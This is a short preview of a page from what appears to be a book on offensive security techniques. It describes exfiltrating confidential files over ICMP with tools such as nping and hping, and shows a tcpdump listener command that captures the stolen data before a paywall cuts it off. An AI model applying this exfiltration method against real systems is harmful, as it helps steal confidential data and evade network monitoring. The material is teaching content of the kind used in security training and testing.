January 2019
Intermediate to advanced
548 pages
12h 7m
English
There are multiple way to utilize the ICMP protocol to exfiltrate files, using tools such as hping, nping, and ping. In this section, we will utilize the nping utility to perform the data exfiltration of confidential documents using the ICMP protocol.
In this example, we will use tcpdump to extract the data from the pcap dump file. Run the following command in the Terminal to enable the listener:
tcpdump -i eth0 'icmp and src host 192.168.1.104' -w importantfile.pcap
Attackers should be able to see the following:
192.168.1.104 is the target host that we are waiting to receive data from. Once hping3 is fired at the client ...
Read now
Unlock full access